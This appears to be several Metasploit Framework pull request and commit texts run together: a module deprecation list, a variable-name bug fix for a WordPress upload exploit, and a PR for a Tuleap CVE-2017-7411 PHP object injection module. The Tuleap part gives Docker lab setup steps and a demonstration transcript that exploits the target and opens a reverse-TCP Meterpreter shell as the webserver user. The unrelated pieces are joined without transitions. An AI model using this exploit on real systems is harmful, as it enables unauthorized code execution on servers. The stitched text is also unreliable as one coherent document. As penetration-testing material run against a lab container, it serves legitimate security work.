Land #9317
The following modules are replaced by the following:
auxiliary/scanner/discovery/udp_probe
is replaced by:
auxiliary/scanner/discovery/udp_sweep
exploit/unix/webapp/wp_ninja_forms_unauthenticated_file_upload
is replaced by:
exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload
exploit/windows/misc/regsvr32_applocker_bypass_server
is replaced by:
exploits/multi/script/web_delivery
Variable on line 67 needs to be changed to "user" from "username" which was undefined and causing error during exploit execution.
[-] Exploit failed: NameError undefined local variable or method `username' for #<Msf::Modules::Mod6578706c6f69742f756e69782f7765626170702f77705f736c69646573686f7767616c6c6572795f75706c6f6164::MetasploitModule:0x0055c61ab093f8>
After changing the incorrect variable name from "username" to "user", the exploit completes.
This PR contains a module to exploit [CVE-2017-7411](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7411), a Second-Order PHP Object Injection vulnerability in Tuleap before version 9.7 that might allow authenticated users to execute arbitrary code with the permissions of the webserver. The module has been tested successfully with Tuleap versions 9.6, 8.19, and 8.8 deployed in a Docker container.
## Verification Steps
The quickest way to install an old version of Tuleap is through a Docker container. So install Docker on your system and go through the following steps:
1. Run `docker volume create --name tuleap`
2. Run `docker run -ti -e VIRTUAL_HOST=localhost -p 80:80 -p 443:443 -p 22:22 -v tuleap:/data enalean/tuleap-aio:9.6`
3. Run the following command in order to get the "Site admin password": `docker exec -ti <container_name> cat /data/root/.tuleap_passwd`
4. Go to `https://localhost/account/login.php` and log in as the "admin" user
5. Go to `https://localhost/admin/register_admin.php?page=admin_creation` and create a new user (NOT Restricted User)
6. Open a new browser session and log in as the newly created user
7. From this session go to `https://localhost/project/register.php` and make a new project (let's name it "test")
8. Come back to the admin session, go to `https://localhost/admin/approve-pending.php` and click on "Validate"
9. From the user session you can now browse to `https://localhost/projects/test/` and click on "Trackers" -> "Create a New Tracker"
10. Make a new tracker by choosing e.g. the "Bugs" template, fill all the fields and click on "Create"
11. Click on "Submit new artifact", fill all the fields and click on "Submit"
12. You can now test the MSF module by using the user account created at step n.5
NOTE: successful exploitation of this vulnerability requires an user account with permissions to submit a new Tracker artifact or access already existing artifacts, which means it might be exploited also by a "Restricted User".
## Demonstration
```
msf > use exploit/unix/webapp/tuleap_rest_unserialize_exec
msf exploit(tuleap_rest_unserialize_exec) > set RHOST localhost
msf exploit(tuleap_rest_unserialize_exec) > set USERNAME test
msf exploit(tuleap_rest_unserialize_exec) > set PASSWORD p4ssw0rd
msf exploit(tuleap_rest_unserialize_exec) > check
[*] Trying to login through the REST API...
[+] Login successful with test:p4ssw0rd
[*] Updating user preference with POP chain string...
[*] Retrieving the CSRF token for login...
[+] CSRF token: 089d56ffc3888c5bc90220f843f582aa
[+] Login successful with test:p4ssw0rd
[*] Triggering the POP chain...
[+] localhost:443 The target is vulnerable.
msf exploit(tuleap_rest_unserialize_exec) > set PAYLOAD php/meterpreter/reverse_tcp
msf exploit(tuleap_rest_unserialize_exec) > ifconfig docker0 | grep "inet:" | awk -F'[: ]+' '{ print $4 }'
msf exploit(tuleap_rest_unserialize_exec) > set LHOST 172.17.0.1
msf exploit(tuleap_rest_unserialize_exec) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Trying to login through the REST API...
[+] Login successful with test:p4ssw0rd
[*] Updating user preference with POP chain string...
[*] Retrieving the CSRF token for login...
[+] CSRF token: 01acd8380d98c587b37ddd75ba8ff6f7
[+] Login successful with test:p4ssw0rd
[*] Triggering the POP chain...
[*] Sending stage (33721 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:56572) at 2017-11-01 16:07:01 +0100
meterpreter > getuid
Server username: codendiadm (497)
```
Brent Cook